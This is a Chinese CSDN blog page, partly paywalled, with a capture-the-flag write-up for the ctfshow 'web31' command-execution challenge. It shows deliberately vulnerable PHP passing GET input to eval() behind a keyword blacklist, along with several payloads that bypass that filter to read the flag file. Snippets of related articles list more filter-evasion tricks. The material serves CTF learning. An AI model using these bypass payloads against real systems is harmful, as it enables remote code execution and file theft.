ctfshow-web入门-命令执行-web31

最新推荐文章于 2023-09-23 23:05:53 发布
最新推荐文章于 2023-09-23 23:05:53 发布
阅读量855 收藏 2
点赞数 1
分类专栏: #命令执行 ctfshow 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/HkD01L/article/details/125397361
版权
ctfshow,命令执行,web31
摘要由CSDN通过智能技术生成

web31

 

<?php
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'/i", $c)){
        eval($c);
    }
    
}else{
    highlight_file(__FILE__);
}

过滤了flag,sstem,php,cat,sort,shell,点,空格,单引号

几种失败的姿势

1.?c=echo `tac fla?.*`;

2.?c=echo `tac fla?.*`;

3. ?c=`cp fla?.* 1.txt`;

姿势一,嵌套eval,逃逸参数

姿势二,show_source(next(array_reverse(scandir(pos(localeconv())))));

array用于创建数组

array_reverse将数组倒序输出

pos函数返回数组中当前元素(指针指向)的值

scandir函数返

最低0.47元/天 解锁文章
HkD01L
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ctfshow-VIP题目-Web-详细解题思路
01-27
CTFSHOW-VIP题目-Web-详细解题思路 本文档总结了CTFSHOW-VIP题目-Web的详细解题思路,涵盖了多个Web安全领域的知识点,包括WP源码泄露、协议头信息泄露、robots后台泄露、phps源码泄露、源码压缩包泄露、版本控制...
CTFshow-Web入门》04. Web 31~40
学习学习学习......
12-03 954
eval() 利用与正则绕过,PHP 伪协议、include() 利用。
ctfshow-命令执行-web31
weixin_43400535的博客
10-28 552
ctfshow-web31 题目描述: 原理: 同web29 审计: <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-04 00:12:34 # @Last Modified by: h1xa # @Last Modified time: 2020-09-04 00:49:10 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ error_r
CTFSHOW web入门——web31
m0_74093152的博客
04-23 199
过滤了flag、system、php、cat、sort、shell、\. 、空格。因此构造payload:?
Ctfshow web入门 phpCVE篇 web311-web315 详细题解 全
Jay17的博客
09-23 539
Ctfshow web入门 phpCVE篇 web311-web315 详细题解 全
ctfshow phpCVE web311-web315 wp
mumuzi的博客
02-04 1808
ctfshow-php-CVE-wp----------
CTFSHOW-phpCVE Writeup
weixin_59419135的博客
11-25 1289
ctfshow phpCVE(web311,web312,web313,web314,web315) CVE-2019-11043,CVE-2018-19935,CVE-2012-1823,PHP_SESSION_UPLOAD_PROGRESS文件包含, XDebug 远程调试漏洞
ctfshow-web41~60-WP
最新发布
02-21
ctfshow-web41~60-WPctfshow-web41~60-WP
CTFshow-菜狗杯-WEB-变量循环取值-我的眼里只有$
03-04
【标题】"CTFshow-菜狗杯-WEB-变量循环取值-我的眼里只有$" 指的是一项网络安全竞赛中的Web题目,该题目重点在于理解PHP编程语言中的变量循环取值机制。在CTF(Capture The Flag)比赛中,参赛者通常需要解决各种...
ctfshow web223-group盲注无数字
10-21
ctfshow web223-group盲注无数字
CTFShow-周末大挑战parse-url篇Writeup
05-19
这表明服务端没有对用户输入进行充分的过滤或转义,允许了任意命令执行。 第二关中,URL编码的方式被用来绕过过滤。`%68%74%74%70%3a%2f%2f%64%61%74%61%3a%3a%2f%2f%74%65%73%74%2f%70%6c%61%69%6e%3b%62%61%73%65...
ctfshow web入门phpcve web311-315
m0_62207170的博客
04-24 470
ctfshow web入门phpcve web311-315
Ctfshow Web入门 命令执行 Web31-74
qq_45427131的博客
10-21 2559
CtfShow Web入门-命令执行 感谢Y4师傅!看Y4的Wp真的学到好多! Web31 过滤条件: flag\system\php\cat\sort\shell\小数点\空格\单引号 执行passthru()查看flag 绕过cat使用tac more less head tac tail nl od(二进制查看) vi vim sort uniq 绕过空格用%09 <> ${IFS} $IFS$9 {cat,fl*} %20 flag绕过可以用通符代替 执行echo查看flag echo
CTFshow-命令执行
weixin_44770698的博客
06-25 2671
ctfshow-web 命令执行
ctfshow web入门 命令执行部分(29-31)
羽的博客
09-05 2199
大佬请自行忽略讲解部分,讲解针对新手。知识点源自payload的构造。大部分flag需要右键查看源码获得 29 知识点:通配符 payload:c=system('cat f*'); 在linux系统中 有一些通配符 * 匹配任何字符串/文本,包括空字符串;*代表任意字符(0个或多个) ls file * ? 匹配任何一个字符(不在括号内时)?代表任意1个字符 ls file 0 [abcd] 匹配abcd中任何一个字符 [a-z] 表示范围a到z,表示范围的意思 []匹配中括号中任意一个字符 ls fil
CTFshow命令执行31
a861511690的博客
06-11 144
error_reporting(0); if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'/i", $c)){ eval($c); } }else{ highlight_file(__FILE__); } 显然对空格单引号都进行了过滤,命令执行有四个函数我们可以使用passthru() 并将’ '替换为"
Ctfshow web入门 命令执行RCE篇 web29-web77 与 web118-web124 详细题解 全
Jay17的博客
08-16 3110
Ctfshow web入门 命令执行RCE篇 web29-web77 与 web118-web124 详细题解 全
CTFshow 命令执行 web29 30 31
ChenD的学习笔记
11-08 1393
CTFshow 命令执行 web29 web30 web31
ctfshow-web31(命令执行)
m0_62094846的博客
01-21 536
<?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-04 00:12:34 # @Last Modified by: h1xa # @Last Modified time: 2020-09-04 00:49:10 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ error_reporting(0); if(isset($_GET['c'])){..
ctfshow-web入门爆破
08-30
ctfshow-web入门爆破中,可以使用正则爆破脚本来实现对目录的暴力破解。该脚本会将true拼接成数字,并以此来替换ASCII码中的数字、字母和特殊符号,以实现对目录的爆破。通过暴力破解目录/0-100/0-100/看返回...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值